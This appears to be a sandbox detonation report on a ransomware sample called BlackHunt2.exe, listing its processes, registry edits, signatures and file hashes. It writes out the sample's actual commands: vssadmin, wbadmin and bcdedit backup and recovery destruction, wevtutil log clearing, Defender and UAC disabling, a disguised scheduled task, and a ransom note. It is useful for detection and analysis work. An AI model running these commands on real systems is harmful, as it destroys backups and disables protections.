PID 2872 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\system32\vssadmin.exe
PID 2872 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 304 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 304 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 304 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe
PID 2872 wrote to memory of 304 N/A C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe C:\Windows\System32\cmd.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe

"C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe" /F

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f

C:\Windows\system32\schtasks.exe

SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe" /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded

C:\Windows\system32\wbadmin.exe

wbadmin.exe delete catalog -quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f

C:\Windows\system32\fsutil.exe

fsutil.exe usn deletejournal /D C:

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\

C:\Windows\system32\fsutil.exe

fsutil usn deletejournal /D F:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected] ,TELEGRAM:@GotchaDec] " /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f

C:\Windows\system32\fsutil.exe

fsutil usn deletejournal /D M:\

C:\Windows\system32\fsutil.exe

fsutil usn deletejournal /D C:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Application

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Security

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\system32\schtasks.exe

SCHTASKS.exe /Delete /TN "Windows Critical Update" /F

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\system32\taskkill.exe

taskkill /IM mshta.exe /f

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected] ,TELEGRAM:@GotchaDec] " /f

C:\Windows\system32\fsutil.exe

fsutil.exe usn deletejournal /D C:

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Setup

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Security /e:false

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl System

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 5

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\system32\wbadmin.exe

wbadmin.exe delete catalog -quiet

C:\Windows\system32\notepad.exe

notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp

Files

C:\ProgramData\#BlackHunt_Private.key

MD5 868458415e80d77143a5d7deed140fef
SHA1 bd873b33c1ea3ef1c8fcaba583fd42e6bf0c6cb2
SHA256 6f49a210dd80cdd7b9ddba7b078a4b2c7b3b40dbf6f75ec7048688d2e3124724
SHA512 903b8d5eddf8fc6aaf7f2d163114c54c9b86fb957150abfb3beca44eef23dadc63990afa592b3f092f0235315c663c6e651a9800d7ff79e74699f7ab48dc50eb

C:\ProgramData\#BlackHunt_ReadMe.hta

MD5 e309e86aa475bf9ab6d9ec368d40fe5a
SHA1 3db62b6572867604cd091a6c518c4458308d002e
SHA256 39c0d064e4419607fa2a3b96691440bb9613e7cf28be9476dbe6c644f07a13d2
SHA512 5d89c38896f51b2e05f3f0a209054cefe770823b929f4ed9c1275df9aaef58b44dae482a3483c295098423a0652672774797ab869dc67967b31af3dfdb151583

C:\ProgramData\#BlackHunt_ReadMe.txt

MD5 88d5b995bf93732281a24ffa8c40ab5c
SHA1 ed0d8cb268e450141673338e131ff2bd97f8b23c
SHA256 69ffdd2db3a73f5a41ba2d4b25d27661112a80f2d403112b11f53454ad5fb5c1
SHA512 ea7a88abc7583e6e50d08b8711fd93bf4d79137e68922c614c9e3ed47fdc0bfae113acd6693ffdbf24dd8c966e667ccee9bb3d958ef28fcbb4aceb9db3ef071e

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-06 00:48

Reported

2024-11-06 00:50

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"

Signatures

Deletes NTFS Change Journal

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\fsutil.exe N/A
N/A N/A C:\Windows\system32\fsutil.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\system32\reg.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Clears Windows event logs

evasion ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (3360) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Disables Task Manager via registry modification

evasion

Disables use of System Restore points

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\System32\cmd.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" C:\Windows\system32\reg.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\fsutil.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\fsutil.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe N/A
